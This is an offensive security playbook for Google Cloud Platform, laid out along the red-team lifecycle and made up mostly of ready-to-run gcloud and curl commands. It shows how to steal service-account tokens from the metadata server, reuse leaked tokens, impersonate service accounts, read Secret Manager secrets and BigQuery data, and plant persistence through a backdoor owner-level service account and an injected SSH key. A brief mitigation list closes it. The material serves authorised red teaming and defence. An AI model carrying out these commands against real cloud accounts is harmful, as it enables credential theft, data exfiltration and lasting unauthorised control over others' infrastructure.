GCP

This playbook outlines offensive security techniques in Google Cloud Platform (GCP). It is structured around the red teaming lifecycle: reconnaissance, exploitation, privilege escalation, lateral move

1. GCP Cloud Overview

Core Components

  • Google Cloud IAM – Identity and Access Management (users, service accounts, roles, policies).

  • Projects – Organizational units that contain resources.

  • Service Accounts – Identities for workloads (VMs, functions, apps).

  • Cloud Resource Hierarchy – Org → Folders → Projects → Resources.

Planes of Access

  • Control Plane – Google Cloud Console, Cloud SDK (gcloud), REST APIs.

  • Data Plane – Actual workloads (VMs, buckets, databases).

🔑 Security Insight:

  • Compromise of Control Plane creds = full takeover.

  • Compromise of Service Account = privilege within project scope (but often escalatable).


2. Authentication & Credential Types

2.1 User Accounts

2.2 Service Accounts

  • Non-human principals for apps/VMs.

  • Auth via JSON key files or Metadata Server.

2.3 Access Tokens

  • OAuth2 bearer tokens (short-lived).

  • Commonly abused via SSRF → metadata server.

Get token inside VM

curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

3. Enumeration

3.1 Identity Enumeration

Check current active account:

gcloud auth list

Get project ID:

gcloud config get-value project

List IAM policy for a project:

gcloud projects get-iam-policy <project-id> --format=json

Find specific service account roles:

gcloud projects get-iam-policy <project-id> --format=json \
  | jq '.bindings[] | select(.members[] | contains("serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'

3.2 Service Account Enumeration

List all service accounts in a project:

gcloud iam service-accounts list --project <project-id>

Get details about a service account:

gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com

List keys associated with a service account:

gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com

3.3 Storage Enumeration

List storage buckets:

gcloud storage buckets list --project <project-id>

List objects in a bucket:

gcloud storage objects list gs://<bucket-name>

Download file from bucket:

gcloud storage cp gs://<bucket-name>/<object> ./localfile

4. Exploitation

4.1 Metadata Service Abuse (IMDS Equivalent)

Inside a VM, access metadata endpoint:

curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

Use the token to authenticate:

export ACCESS_TOKEN=$(curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token)

gcloud auth activate-access-token $ACCESS_TOKEN

4.2 Using Leaked Tokens

If attacker has a token (e.g., from logs, SSRF):

echo "<token>" > token.txt
gcloud auth activate-access-token $(cat token.txt)

Example (from CTF-like scenario):

gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt

4.3 Privilege Escalation via Service Accounts

If SA has roles like roles/iam.serviceAccountUser or roles/editor, attacker can impersonate or escalate:

gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com

5. Post-Exploitation

5.1 Key Vaults / Secrets

If Cloud KMS or Secret Manager accessible:

gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>

5.2 BigQuery Data Dumping

gcloud bigquery datasets list --project <project-id>
gcloud bigquery tables list --dataset_id <dataset>
gcloud bigquery tables describe <dataset>.<table>

6. Lateral Movement

  • Use compromised service account to pivot into other projects.

  • Enumerate organization-level roles:

gcloud organizations get-iam-policy <org-id> --format=json
  • Abuse roles like roles/resourcemanager.folderViewer, roles/resourcemanager.projectMover for movement.


7. Persistence

  • Create new service account and assign roles:

gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
  --member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
  --role="roles/owner"
  • Add SSH key to compromised VM instance:

gcloud compute instances add-metadata <vm-name> \
  --metadata ssh-keys="attacker:<public-key>"

8. Detection & Mitigation

  • Monitor IAM policy changes (Cloud Audit Logs).

  • Restrict service account privileges (principle of least privilege).

  • Restrict metadata access (firewall, no public SSRF exposure).

  • Rotate keys/tokens frequently.

  • Enable VPC Service Controls to limit lateral movement.

Last updated